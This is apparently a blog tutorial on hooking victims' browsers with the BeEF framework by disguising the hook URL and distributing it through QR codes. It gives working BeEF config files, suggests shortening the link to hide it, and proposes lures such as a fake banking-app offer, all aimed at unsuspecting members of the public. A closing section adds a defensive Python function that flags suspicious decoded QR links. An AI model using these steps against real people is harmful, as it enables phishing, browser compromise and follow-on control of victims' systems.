Hooking Browsers With BeEF & QR Codes

For those unfamiliar with the Browser Exploitation Framework Project, or BeEF, it is a tool for launching attacks against what is often the only door left open: the web browser. Once the browser is compromised, BeEF can launch further attacks to control the system. While some of us know not to scan any QR code we find, most people assume that they are safe. You can find them posted all around: sales circulars, marketing materials, magazines. They’re everywhere. Why not take advantage of that inherent trust?

For this tutorial, I’m going to assume that you are running Backtrack 5 R3 or Kali. If not, installation instructions can be found here.

customhook

First things first, we need to edit the customhook config. When BeEF fires up, it sets the hook location to your.i.p.address/hook/, which is pretty obvious. So by editing the config, we can set a custom name for our hook and make it a little less conspicuous. The config can be found at $BEEF_ROOT/extensions/customhook/config.yaml. Pop that open with your favorite editor and change the values to whatever you want. It’s pretty self-explanatory.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        customhook:
            enable: true
            name: 'Custom Hook Point with iFrame Impersonation'
            customhook_path: "/notice"
            customhook_target: "http://heyyeyaaeyaaaeyaeyaa.com/"
            customhook_title: "Notice"

Make sure you set “enable:” to true.

qrcode

Next, we need to edit the qrcode extension’s config. All you need to do here is set “enable:” to true and set the “target:” to your customhook location (or a bit.ly link of it if you’re feeling extra sneaky ;) ). It can be found at $BEEF_ROOT/extensions/qrcode/config.yaml.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        qrcode:
            name: 'QR Code Generator'
            enable: true
            authors: ["xntrik"]
            target: ["mybeefserver.com/notice"]
            qrsize: "300x300"

Now when you start BeEF, it will generate a QR code for your hook. You can also append the URL of your customhook to https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl= and it’ll generate a code for you.

Attack!

Once you fire up BeEF after making the changes, it will create your custom hook in the location you set, as well as provide you with a URL where you can download your QR code. Now the only thing left to do is figure out how you want to use it. “Scan this to try our new mobile banking app for your iPhone!” The possibilities are endless.
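
Seen from the other side, the text a scanner decodes from a QR code can be triaged before a browser ever opens it. The sketch below is an added example, not part of the original post or of BeEF: the function name, the finding labels and the shortener list are assumptions, and the sample payloads are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed, non-exhaustive shortener list (bit.ly is the one the post names).
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl", "ow.ly", "is.gd"}


def triage_qr_payload(payload):
    """Return findings for text decoded from a QR code.

    An empty list means no check fired, not that the link is safe: a renamed
    hook path on an HTTPS domain looks like any other URL.
    """
    findings = []
    text = payload.strip()
    has_scheme = "://" in text
    if not has_scheme:
        # Targets are often written as "host/path"; assume http:// to parse.
        findings.append("no-scheme")
        text = "http://" + text
    try:
        parts = urlsplit(text)
    except ValueError:
        return findings + ["unparseable"]
    if parts.scheme not in ("http", "https"):
        return findings + ["non-web-scheme"]
    if has_scheme and parts.scheme == "http":
        findings.append("cleartext-http")
    host = (parts.hostname or "").lower()
    if not host:
        return findings + ["no-host"]
    try:
        ipaddress.ip_address(host)
        findings.append("ip-literal-host")
    except ValueError:
        pass  # a DNS name, not an IP literal
    bare = host[4:] if host.startswith("www.") else host
    if bare in SHORTENERS:
        findings.append("shortener-hides-destination")
    if parts.username or parts.password:
        findings.append("userinfo-in-url")
    return findings


if __name__ == "__main__":
    # Constructed samples; the first is the target value from the qrcode config.
    for sample in ("mybeefserver.com/notice", "https://bit.ly/EXAMPLE",
                   "http://192.0.2.10/notice", "https://example.org/menu"):
        print(sample, "->", triage_qr_payload(sample) or "no findings")
```

Because the hook path and page title are configurable, string checks like these only narrow the field; a shortened link still has to be expanded and the destination inspected before it is trusted.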